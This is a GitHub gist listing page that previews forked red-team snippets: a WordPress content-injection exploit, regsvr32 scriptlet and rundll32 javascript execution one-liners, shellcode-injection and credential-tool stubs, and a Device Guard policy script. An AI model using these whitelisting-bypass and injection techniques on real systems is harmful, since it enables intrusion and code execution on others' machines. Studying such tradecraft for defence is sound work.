Daniel DanielRTeixeira
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCvXIGeuwHQzt0XVyRBA9/bCK7j9b4celVVd5ATSr/6Ev6QiBagf+d11l71Eqhznddzgi5+hEB+j5VPJq+4EjdD7JLnVjd/kxd4xkCFjkWsjEY9Vh41kZDoB3F0z92zkwHIx/wVtJJdq6vUX1Q9TMSRjQrA+XpdotSU+2Q/lBP12QIDAQAB |
DanielRTeixeira
/ wordpress_content_injection.py
Created
May 19, 2017 11:16
— forked from budanthara/wordpress_content_injection.py
Wordpress content injection exploit by snoww0lf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python | |
| """ | |
| Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html | |
| REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post | |
| Wordpress Version Affected: 4.7.0/4.7.1 | |
| 2017 - Coded by snoww0lf. | |
| """ | |
| import re |
DanielRTeixeira
/ example.sct
Created
November 2, 2017 15:21
— forked from nicholasmckinney/example.sct
SCT File Obfuscation Examples:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| //x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll |
DanielRTeixeira
/ rwxHunter.cs
Created
November 2, 2017 15:21
— forked from nicholasmckinney/rwxHunter.cs
Locate a RWX Region in memory in InstallUtil.exe - Copy Shellcode Into It and Execute. Avoid VirtuallAlloc Call
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
DanielRTeixeira
/ dgconfig.ps1
Created
November 2, 2017 15:23
— forked from nicholasmckinney/dgconfig.ps1
Sample Device Guard Configuration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $s1 = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible") | |
| $s2 = gwmi Win32_ShadowCopy | ? { $_.ID -eq $s1.ShadowID } | |
| $d = $s2.DeviceObject + "\" | |
| cmd /c mklink /d C:\scpy "$d" | |
| New-CIPolicy -Level LeafCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs | |
| $s2.Delete() | |
| Remove-Item -Path C:\scpy -Force | |
| Set-RuleOption –option 3 –FilePath C:\BasePolicy.xml | |
| ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin | |
| Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -force |
DanielRTeixeira
/ beaconPayload.cs
Created
November 2, 2017 15:23
— forked from nicholasmckinney/beaconPayload.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
DanielRTeixeira
/ gist:63a236c81536872b0d913f64358a5f83
Created
November 2, 2017 15:23
— forked from nicholasmckinney/gist:3d748d6c3d7d52ce37479f7ef96a5478
DynaCall Article Dr Dobbs, November 1998
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|  | |
| An Automation Object for Dynamic DLL Calls | |
| Here's an OLE automation object for dynamically declaring and accessing functions in external DLLs | |
| November 01, 1998 URL:http://www.drdobbs.com/windows/an-automation-object-for-dynamic-dll-cal/210200078 Jeff Stong has been developing DOS, Windows, and Windows NT based applications for 10 years. Jeff can be contacted at [email protected]. | |
| You can access external DLLs from Visual Basic by using the Declare statement to declare the name of the function you want to call and the DLL that it resides in. VBScript, however, doesn't support the Declare statement. This article presents an OLE automation object that lets VBScript (or any other environment that can access automation objects) dynamically declare and access functions in external DLLs. | |
| Using the DynamicWrapper Object |
DanielRTeixeira
/ sample.cmd
Created
November 2, 2017 15:23
— forked from nicholasmckinney/sample.cmd
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.Exec(\"calc\")"); |
DanielRTeixeira
/ netkatz.cs
Created
November 2, 2017 15:23
— forked from nicholasmckinney/netkatz.cs
Prototype - x86
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
DanielRTeixeira
/ _commands.txt
Created
November 2, 2017 15:23
— forked from nicholasmckinney/_commands.txt
Basic Example of Binary Patching With MPatch.exe and APatch.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Build Your Binaries | |
| c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe a.cs | |
| c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe b.cs | |
| c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe c.cs | |
| # Create Your Patch | |
| # You need Windows 7 SDK | |
| "C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin\mpatch.exe" a.exe b.exe dbi_patch |
OlderNewer